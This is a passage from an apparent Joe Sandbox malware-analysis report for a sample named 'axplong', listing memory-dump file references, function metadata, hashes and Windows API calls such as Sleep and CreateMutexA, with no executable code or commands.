                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768422851.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768436667.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768456368.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768563441.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768578614.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768639700.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768654389.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768672961.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768687224.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768701857.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768716608.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768730939.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768746480.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768765033.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768779649.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768793213.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768807399.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768823367.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768845576.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768859098.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768874341.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768891184.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768905837.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768921386.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768969984.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768984610.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769000531.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769015221.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769031612.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769047938.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769108637.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769123572.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769136569.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769151732.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769164889.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769179945.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769193334.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                    • String ID: $2m
                                                                                                                                                                                                                                                    • API String ID: 1464230837-511082170
                                                                                                                                                                                                                                                    • Opcode ID: abd2b9b36bc22c8c7d68df5f866b1bac4cd0c0aec3ca35b81726e11859c3c7e5
                                                                                                                                                                                                                                                    • Instruction ID: d885ff663be9c6a0f1797f2f22214062090d1744d6270bd65f86ad24ba6a27b6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: abd2b9b36bc22c8c7d68df5f866b1bac4cd0c0aec3ca35b81726e11859c3c7e5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 08217C317142009BEB189BA8DC887ADB763DFC5321F24822EE418DB7C6D73596818753
                                                                                                                                                                                                                                                    Function 0067A786 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 306 67a786-67a79e 307 67a7a0-67a7ac 306->307 308 67a7cc-67a7ce 306->308 311 67a7c2-67a7c9 call 68d593 307->311 312 67a7ae-67a7bc 307->312 309 67a7d0-67a7d7 308->309 310 67a7d9-67a7e1 call 677d00 308->310 314 67a81b-67a846 call 687f30 309->314 322 67a814-67a816 310->322 323 67a7e3-67a7eb call 677d00 310->323 311->308 312->311 316 67a87e 312->316 320 67a883-67a8b7 Sleep CreateMutexA 316->320 321 67a87e call 6a6b9a 316->321 325 67a8be-67a8c4 320->325 321->320 322->314 323->322 331 67a7ed-67a7f5 call 677d00 323->331 327 67a8d7-67a8d8 325->327 328 67a8c6-67a8c8 325->328 328->327 330 67a8ca-67a8d5 328->330 330->327 331->322 335 67a7f7-67a7ff call 677d00 331->335 335->322 338 67a801-67a809 call 677d00 335->338 338->322 341 67a80b-67a812 338->341 341->314
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Sleep.KERNELBASE(00000064), ref: 0067A893
                                                                                                                                                                                                                                                    • CreateMutexA.KERNELBASE(00000000,00000000,006D3224), ref: 0067A8B1
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768318896.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768336160.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768392135.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768407032.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768422851.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768436667.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768456368.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768563441.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768578614.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768639700.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768654389.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768672961.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768687224.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768701857.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768716608.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768730939.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768746480.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768765033.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768779649.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768793213.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768807399.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768823367.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768845576.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768859098.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768874341.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768891184.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768905837.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768921386.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768969984.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768984610.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769000531.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769015221.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769031612.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769047938.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769108637.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769123572.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769136569.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769151732.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769164889.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769179945.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769193334.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                    • String ID: $2m
                                                                                                                                                                                                                                                    • API String ID: 1464230837-511082170
                                                                                                                                                                                                                                                    • Opcode ID: adff592d471c83311750080ecfe3fb836b1e02175152d9cd3174da12287ad859
                                                                                                                                                                                                                                                    • Instruction ID: ec112939e232e8e7f9d8410c79aabdf39ad3bb311d64cabc40a95ee268ecd396
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: adff592d471c83311750080ecfe3fb836b1e02175152d9cd3174da12287ad859
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6D212B317581005AEB3867E8D84ABBD7363DFC1710F24C92EE40D967D2DA75994182A7

                                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                                    Function 006AC9B0 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 320COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768318896.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768336160.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768392135.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768407032.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768422851.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768436667.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768456368.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768563441.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768578614.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768639700.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768654389.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768672961.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768687224.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768701857.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768716608.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768730939.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768746480.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768765033.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768779649.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768793213.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768807399.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768823367.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768845576.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768859098.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768874341.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768891184.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768905837.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768921386.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768969984.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768984610.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769000531.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769015221.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769031612.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769047938.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769108637.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769123572.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769136569.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769151732.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769164889.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769179945.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769193334.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _strrchr
                                                                                                                                                                                                                                                    • String ID: 5uj
                                                                                                                                                                                                                                                    • API String ID: 3213747228-583990172
                                                                                                                                                                                                                                                    • Opcode ID: b713bfd49b51041abb555fe8b87117765181b7de4fabe3ba4743ab7c7481a45c
                                                                                                                                                                                                                                                    • Instruction ID: 523d5eb6abc0f8f4256cd81fe1e47ea8100008bb53d00277e20c4231cec9590a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b713bfd49b51041abb555fe8b87117765181b7de4fabe3ba4743ab7c7481a45c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0CB127329002459FDB11EF68C8817FEBBE7EF56360F1481AAE4559B342D6359D42CF60
                                                                                                                                                                                                                                                    Function 00672E80 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 272COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768318896.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768336160.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768392135.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768407032.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768422851.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768436667.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768456368.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768563441.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768578614.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768639700.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768654389.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768672961.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768687224.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768701857.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768716608.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768730939.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768746480.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768765033.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768779649.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768793213.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768807399.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768823367.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768845576.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768859098.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768874341.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768891184.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768905837.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768921386.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768969984.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768984610.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769000531.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769015221.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769031612.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769047938.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769108637.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769123572.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769136569.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769151732.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769164889.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769179945.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769193334.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Mtx_unlock
                                                                                                                                                                                                                                                    • String ID: 7oq<
                                                                                                                                                                                                                                                    • API String ID: 1418687624-377005865
                                                                                                                                                                                                                                                    • Opcode ID: d26aab92813eeeb3588c10b32599ab2f986453dad8efd287e2449a655284c76c
